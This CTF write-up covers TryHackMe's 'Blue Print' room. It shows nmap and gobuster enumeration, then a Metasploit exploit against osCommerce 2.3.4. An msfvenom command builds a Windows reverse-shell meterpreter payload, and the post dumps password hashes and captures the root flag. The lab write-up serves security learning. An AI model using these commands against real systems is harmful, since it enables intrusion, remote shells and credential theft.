CatSec.org

Blue Print

In this post, we will look into the room “Blue Print” from TryHackMe, which can be found on https://tryhackme.com

Enumeration

echo machine-ip blueprint.com >> /etc/hosts

# Nmap 7.80 scan initiated Thu Jun 18 03:21:05 2020 as: nmap -sC -sV -oN nmap.txt blueprint.com
Nmap scan report for blueprint.com (10.10.135.2)
Host is up (0.48s latency).
Not shown: 987 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 404 - File or directory not found.
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Bad request!
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql        MariaDB (unauthorized)
8080/tcp  open  http         Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Index of /
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
Service Info: Hosts: BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -19m57s, deviation: 34m36s, median: 0s
|_nbstat: NetBIOS name: BLUEPRINT, NetBIOS user: <unknown>, NetBIOS MAC: 02:2c:8d:2f:12:fa (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: BLUEPRINT
|   NetBIOS computer name: BLUEPRINT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-06-18T08:23:19+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-18T07:23:16
|_  start_date: 2020-06-18T07:17:16

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 18 03:23:34 2020 -- 1 IP address (1 host up) scanned in 149.46 seconds

I tried running enum4linux but could not get anything, eternal blue also does not work

webserver on port 80 have nothing

moving onto webserver on port 8080

we see a website lets try use gobuster for directory brute-forcing

gobuster dir -u http://blueprint.com:8080/oscommerce-2.3.4/catalog/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
2020/06/18 03:47:51 Starting gobuster
===============================================================
/download (Status: 401)
/images (Status: 301)
/pub (Status: 301)
/Images (Status: 301)
/admin (Status: 301)
/includes (Status: 301)
/install (Status: 301)
/Download (Status: 401)
/ext (Status: 301)
/INSTALL (Status: 301)
/IMAGES (Status: 301)
/%20 (Status: 403)
/Admin (Status: 301)
/*checkout* (Status: 403)

checking the install page we see something fishy also we will get the version of oscommerce now lets dig deep into this webserver and search for an exploit start metasploit and search oscommerce

Exploitation

Exploit we will use: exploit/multi/http/oscommerce_installer_unauth_code_exec set options

exploit

we will get a meterpreter session 
but this session is not stable

So we will create a payload and upload it using the meterpreter session

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

open another tab and run metasploit

use handler and and run it

on the previous meterpreter session
run: 
execute -f shell.exe
and we will get a new meterpreter session that is stable
run:
hashdump
to look for hashes and crack them online using htts://crackstation.net

Lab user hash

Lab:1000:aad3b435b51404eeaad3b435b51404ee:??????????????????????:::

go????????

root flag

navigate to C:\Users\Administrator\Desktop cat the root flag

THM{????????????????????9bee}